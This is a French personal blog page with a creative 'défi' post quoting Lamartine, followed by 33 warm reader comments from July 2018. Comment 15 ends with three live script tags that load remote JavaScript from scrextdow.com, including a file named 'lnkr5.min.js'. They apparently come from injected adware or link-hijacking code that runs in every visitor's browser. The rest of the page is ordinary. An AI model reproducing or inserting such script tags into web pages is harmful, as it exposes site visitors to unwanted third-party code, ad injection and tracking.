• Défi chez Vaniyé

     

     

        mardi 10

     

    “Le plus glorieux spectacle de l'univers !

    Un lever de soleil sur la campagne.”

    Carol Boily.

     

        mardi 10

     

    Murmure autour de ma nacelle,
    Douce mer dont les flots chéris,
    Ainsi qu’une amante fidèle,
    Jettent une plainte éternelle
    Sur ces poétiques débris.

    Alphonse de Lamartine

    extrait.

     

      Défi chez Vaniyé

    « rhoooo c'est si loin ... Idées relaxantes ... »

  • Commentaires

    33
    Mercredi 11 Juillet 2018 à 15:55

    bonjour Nicole un petit coucou en passant pour te souhaiter une très bonne après midi j 'espère que tu va bien ?  prend soin de toi ma douce

    gros bisous de ton amie

    Béa

    anniversaire de ma petite fille

    32
    Mercredi 11 Juillet 2018 à 09:37

    bonjour ma Juju j'espere que tu vas bien

    il fait deja chaud ce matin et beau soleil

    belle journée

    gros bisous

    Elyci

    31
    Mardi 10 Juillet 2018 à 22:53

    Coucou ma Juju

    Il est vraiment superbe ce poème de Lamartine

    et tes créations tous aussi magnifiques !

    Un enchantement de venir de voir !

    Passe une belle semaine, gros bisou

    Résultats de recherche d'images pour « Bonne journée du mardi png »

    30
    Mardi 10 Juillet 2018 à 22:25

    Le 10 juillet 18

    Bonsoir Juju

    Juste un petit coucou pour te remercier de ta visite

    Je suis en demi pause car j'ai ma maman qui est hospitalisée  et il me faut

    2h, de route aller et retour  pour aller la trouver.

    J'espère que tu vas mieux et je te souhaite une bonne et douce soirée

    gros bisous

    Ton amie Janine

    29
    Mardi 10 Juillet 2018 à 21:03

    Coucou ma chère Nicole,

    comment vas-tu depuis ton dernier malaise?

    Tu te terres à l'ombre, tu as raison mais aujourd'hui, nous n'avons pas eu trop chaud le soleil se cachait.

    J'ai bien aimé ta page, avec la belle citation de Lamartine. Et la créa ou tuto avec la petite fille dans les coquelicots, c'est superbe.

    Bonne soirée et gros bisous.

    28
    Mardi 10 Juillet 2018 à 18:30

    Coucou Manou

    Je ne suis pas en avance, ce matin un RDV et cet aprem plage !!!

    Tes créas sont très belles !

    Merci pour ton partage

    Bisous, bonne soirée et ....

    Allez les Bleus !!!

    27
    Mardi 10 Juillet 2018 à 17:59
    septsup

    comme c est joli… ça te réussit de faire des défis… gros bisous moi itou maison au frais...

    26
    Mardi 10 Juillet 2018 à 16:46

    Coucou ma belle

    c'est sous un ciel gris que je passe te faire un petit bonjour, le soleil boude

    très belles tes créations, prends bien soin de toi, je t'embrasse  Puce

     

    25
    Mardi 10 Juillet 2018 à 16:42

    un ptit coucou   pendant  que  le bureau est à l 'ombre  rires 

     encore chaude  cette journée 

     et la je ne suis pas au bord du ruisseau  

     bises  Nicole 

     

     kénavo

    24
    Mardi 10 Juillet 2018 à 15:51

    Bonjour ma douce amie ..Je croyais etre passée chez toi , il y a quelques jours , mais j'ai du oublier et croire  que c’était  fait , ca m'arrive quelques fois , il faut que je fasse attention a ma mémoire..  c'est  bien  je  vois  que  tu  continues  ta  marche , moi  je  fais  mes exercises  tous les jours en piscine ..comme toi  ca  va  mieux  ca  depend  des  jours .. Bonne  semaine  Nicole ..
    Je t'embrasse ..

    23
    Mardi 10 Juillet 2018 à 15:31

    Bonjour Juju.

    C'est avec du Soleil et le beau temps qui ne nous quitte pas depuis quelque temps que je te souhaite un bon Mardi.

    Bisous de nous deux.

    v

    22
    Mardi 10 Juillet 2018 à 15:07

    Merci Juju pour tes doux mots

    Comme elles sont belles tes créas, j'adore tout ce qui touche à la nature...

    Je te fais de gros bisous à l'ombre...un petit café si tu veux, ma porte est ouverte....tu es la bienvenue..!!

    21
    Mardi 10 Juillet 2018 à 14:39

    ces créations sont magnifiques Juju,il fait chaud en gironde et les plantes souffrent en peu,je te souhaite un très bon Mardi,bises

    20
    Mardi 10 Juillet 2018 à 13:58

    Bonjour Nicole

    Magnifiques tes créations , j'adore la première .

    Je te souhaite un très bon après-midi.

    Gros bisous

    19
    Mardi 10 Juillet 2018 à 12:58
    Bonjour Nicole,
    Tu m'epates à chaque fois avec tes créas, moi tu vois j'ai pas la patience.
    Merci du partage.
    Bonne journée, grosses bises Véronique
    18
    Mardi 10 Juillet 2018 à 12:16

    Bonjour Nicole,

    2 sublimes  créations accompagnées de très beaux textes.

    Je te souhaite une très bonne journée.

    Bisous

    17
    Mardi 10 Juillet 2018 à 11:15

    Coucou, Nicole, j'aime tes créas et les citations qui les accompagnent .

    De gros bisous ensoleillés et ... très chauds.

    Jo.

    16
    Mardi 10 Juillet 2018 à 10:59

    Bonjour ma petite Juju,

    J'adore tes articles, toujours des belles créas et des belles citations !

    J'espère que tu vas mieux ma douce amie ? Je pense bien à toi.

    Merci de passer sur mes deux blogs, tu es adorable ! 

    Bonne journée, des gros bisous.

    Florence

    15
    Mardi 10 Juillet 2018 à 10:53

    Bonjour Juju,

    toujours belles tes citations agrémentées d'images

    bisou mon amie profite bien du soleil,

    et du beau temps ça va pas durer y paraît,

    j'espère que tu va mieux ,

     

     

     

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>

    14
    Mardi 10 Juillet 2018 à 10:39

    Jolies créations j'adore la première, l'extrait du poème de Lamartine est superbe , bisous !

    13
    Mardi 10 Juillet 2018 à 09:43

    bonjour ma Juju me revoila

    oh tes creations sont tres belles

    j'aime bien ta page ma douce

    j'espere que tu vas bien

    belle journée gros bisous

    Elyci

    12
    Mardi 10 Juillet 2018 à 09:42

    bonjour Nicole ,joli article bon mardi bisouss

    11
    Mardi 10 Juillet 2018 à 09:07

    bonjour Nicole tes créations sont très belles j'aime beaucoup car elles sont toutes différentes et ton blog est magnifique je te souhaite de passer une très bonne journée prend soin de toi ma douce

    gros bisous de ton amie

    Béa

    10
    Mardi 10 Juillet 2018 à 08:44

    Bonjour Juju ,merci pour ces jolies créas , cette petite poupée est toute mignonne !Encore une journée "torride "  ! Pauvres de nous LOL !BISOUS .

    9
    Mardi 10 Juillet 2018 à 08:40

    Coucou mon amie

     C'est toujours aussi chaudement que je viens te rendre

    une tite visite.

    Magnifique tes créas ma douce,

    J'adore tes designs variés!

    Comment vas tu?

    un très gros bisou

    Marjolaine

    8
    Mardi 10 Juillet 2018 à 08:15

    Bonjour ma juju

    Mon petit coucou du matin un peu plus tôt aujourd'hui j'espère que tu vas bien merci pour ces magnifiques créations toujours de belles présentation douce journée gros bisous

    Marlène

    7
    Mardi 10 Juillet 2018 à 08:12

    Douceur 

    Et beauté 

    Bravo à toi 

    _DSC3761

    Bonne journée 

    6
    Mardi 10 Juillet 2018 à 07:39

    Superbes ces créations Nicole.

    De la brume en mer ce matin.

    Bises et bon mardi

    5
    Mardi 10 Juillet 2018 à 07:33

    J'aime bien cette petite fermière et ces oies !

    Belle journée Juju gros bisous !

    4
    Mardi 10 Juillet 2018 à 07:20

    Elle est trop belle ta petite gardienne d'oies et ces beaux coquelicots.Bisous.

    Résultat de recherche d'images pour "gifs animés prends bien soin de toi"

    3
    Mardi 10 Juillet 2018 à 07:12

    Un p'tit coucou pour te souhaiter une très bonne journée

    Bisous

    2
    Mardi 10 Juillet 2018 à 06:24

    Oh que c'est joli !

    Bisou

    1
    Mardi 10 Juillet 2018 à 06:04

    je viens te souhaiter une agréable journée 

    bisous venant de Bourgogne 



    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :